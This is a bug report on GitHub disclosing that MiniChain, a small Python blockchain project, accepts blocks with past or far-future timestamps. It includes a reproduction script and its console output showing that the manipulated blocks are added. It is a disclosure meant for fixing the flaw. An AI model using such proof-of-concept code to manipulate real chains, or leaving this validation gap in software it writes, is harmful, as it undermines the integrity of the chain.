[BUG]: Potential time-warp attack due to missing block timestamp validation #79
Description
Summary
The current implementation lacks strict validation for block timestamp ordering during block acceptance in the blockchain logic.
This allows blocks with manipulated timestamps (past or far-future timestamps) to be added to the chain, potentially leading to inconsistent block ordering and incorrect chain progression.
Description
While analyzing the blockchain logic, it was observed that the system does not enforce strict timestamp validation when adding new blocks to the blockchain.
In blockchain systems, timestamps must follow monotonic progression to maintain chronological integrity and prevent manipulation of block order.
Currently:
- Blocks can be created with arbitrary timestamps
- No strict validation ensures:
- new_block.timestamp > previous_block.timestamp
- No future timestamp bound is enforced
- Chain accepts block without verifying timestamp progression
This may lead to:
- Incorrect block ordering
- Inconsistent blockchain state
- Time manipulation risks
- Reduced reliability of chronological data
- Security and consistency concerns
Affected Component
Blockchain block validation and addition logic
Possible location:
minichain/chain.py
minichain/block.py
Specifically:
add_block()
validate_block_link_and_hash()
Timestamp validation appears to be missing before appending the block to the chain.
Steps to Reproduce
1. Clone the repository
git clone https://github.com/srush/MiniChain.git
cd MiniChain2. Create virtual environment
python3 -m venv venv
source venv/bin/activate3. Install dependencies
pip install -r requirements.txt4. Create reproduction script
Create a file:
reproduce_timestamp_bug.py
5. Add the following code
from minichain.chain import Blockchain
from minichain.block import Block
print("\nInitializing Blockchain...")
blockchain = Blockchain()
genesis = blockchain.last_block
print("\nGenesis Block Created")
print("Genesis Index:", genesis.index)
print("Genesis Timestamp:", genesis.timestamp)
print("Genesis Hash:", genesis.hash)
print("\n--- Current Blockchain ---")
for block in blockchain.chain:
print(f"Index: {block.index}, Timestamp: {block.timestamp}, Hash: {block.hash}")
print("--------------------------")
print("\nCreating malicious block with PAST timestamp...")
past_block = Block(
index=1,
previous_hash=genesis.hash,
transactions=[],
timestamp=0
)
past_block.hash = past_block.compute_hash()
result1 = blockchain.add_block(past_block)
print("\nPast Block Added:", result1)
print("Past Block Timestamp:", past_block.timestamp)
print("\n--- Current Blockchain ---")
for block in blockchain.chain:
print(f"Index: {block.index}, Timestamp: {block.timestamp}, Hash: {block.hash}")
print("--------------------------")
print("\nCreating malicious block with FUTURE timestamp...")
future_block = Block(
index=2,
previous_hash=past_block.hash,
transactions=[],
timestamp=9999999999999
)
future_block.hash = future_block.compute_hash()
result2 = blockchain.add_block(future_block)
print("\nFuture Block Added:", result2)
print("Future Block Timestamp:", future_block.timestamp)
print("\n--- Current Blockchain ---")
for block in blockchain.chain:
print(f"Index: {block.index}, Timestamp: {block.timestamp}, Hash: {block.hash}")
print("--------------------------")
print("\nFinal Blockchain Length:", len(blockchain.chain))
if result1 and result2:
print("\nVULNERABILITY CONFIRMED")
print("Blockchain accepts miner-controlled timestamps")6. Run the script
python reproduce_timestamp_bug.pyActual Result
The blockchain accepts blocks with invalid timestamps.
(venv) moksha@LAPTOP-4EPBCM0Q:~/MiniChain$ python reproduce_timestamp_bug.py
Initializing Blockchain...
Genesis Block Created
Genesis Index: 0
Genesis Timestamp: 1774686731778
Genesis Hash: 0000000000000000000000000000000000000000000000000000000000000000
--- Current Blockchain ---
Index: 0, Timestamp: 1774686731778, Hash: 0000000000000000000000000000000000000000000000000000000000000000
--------------------------
Creating malicious block with PAST timestamp...
Past Block Added: True
Past Block Timestamp: 0
--- Current Blockchain ---
Index: 0, Timestamp: 1774686731778, Hash: 0000000000000000000000000000000000000000000000000000000000000000
Index: 1, Timestamp: 0, Hash: 3be96ee4ee6640453ad9848f871646090466398d777e5d4e035f3dec0d07cc5f
--------------------------
Creating malicious block with FUTURE timestamp...
Future Block Added: True
Future Block Timestamp: 9999999999999
--- Current Blockchain ---
Index: 0, Timestamp: 1774686731778, Hash: 0000000000000000000000000000000000000000000000000000000000000000
Index: 1, Timestamp: 0, Hash: 3be96ee4ee6640453ad9848f871646090466398d777e5d4e035f3dec0d07cc5f
Index: 2, Timestamp: 9999999999999, Hash: 2c3c2da8c193d2d0009a243628fefe1d01b7bf3bd4d38815130e7abd9087adba
--------------------------
Final Blockchain Length: 3
VULNERABILITY CONFIRMED
Blockchain accepts miner-controlled timestamps
No timestamp validation in chain.py
(venv) moksha@LAPTOP-4EPBCM0Q:~/MiniChain$
Both past and future timestamp blocks are accepted by the blockchain.
Expected Result
The blockchain should reject blocks with invalid timestamps.
Expected behavior:
- Block timestamp must be greater than previous block timestamp
- Block timestamp must follow chronological order
- Invalid timestamp blocks should be rejected
- Blockchain should maintain consistent block ordering
Example:
Past Block Added: False
Future Block Added: False
Final Blockchain Length: 1
Impact
Medium
- Chronological integrity of blockchain may be affected
- Block ordering may become inconsistent
- Time-based manipulation becomes possible
- Chain reliability decreases
- Validation mechanism is incomplete
Additional Context
This issue was identified through manual testing and reproduction using a custom script.
The issue is consistently reproducible in the current implementation.